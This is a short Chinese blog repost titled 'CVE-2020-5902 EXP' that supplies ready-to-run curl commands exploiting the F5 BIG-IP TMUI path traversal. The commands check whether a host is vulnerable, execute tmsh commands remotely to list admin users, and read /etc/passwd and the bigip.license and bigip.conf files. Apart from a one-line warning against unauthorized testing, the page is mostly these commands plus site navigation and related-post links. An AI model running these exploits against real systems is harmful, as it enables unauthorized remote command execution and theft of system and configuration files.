CVE-2020-5902 EXP

admin

102737
文章

87
评论

2022年3月26日02:01:51评论58 views字数 589阅读1分57秒阅读模式

请勿用于非授权渗透测试。

From：@x4ce

检测是否存在，保存为.sh文件

curl --silent --insecure 'https://[ip]/tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=Vulnerable' | grep -q Vulnerable && printf '33[0;31mVulnerablen' || printf '33[0;32mNot Vulnerablen'

RCE:

curl -v -k  'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'

读文件：

curl -v -k  'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'

CVE-2020-5902 EXP

读配置文件

https://[host]tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license

或/config/bigip.conf

本文始发于微信公众号（关注安全技术）：CVE-2020-5902 EXP

左青龙
微信扫一扫

右白虎
微信扫一扫

CVE-2020-5902 EXP

PostExpKit - 20240423更新

yzmcms-pay_callback-rce漏洞复现

owasp大模型应用威胁视图理解大模型应用目前所面临的主要安全威胁

新一代供应链安全攻击面

《生成式人工智能数据应用合规指南》正式发布，5月1日实施

漏洞挖掘 | 某米企业src未授权访问

初遇内嵌WebShell的pdf文件

Hackerone 附件功能存在IDOR越权漏洞15000$

从环境搭建到内网渗透靶机

漏洞挖掘之某厂商OAuth2.0认证缺陷

发表评论

在线咨询

微信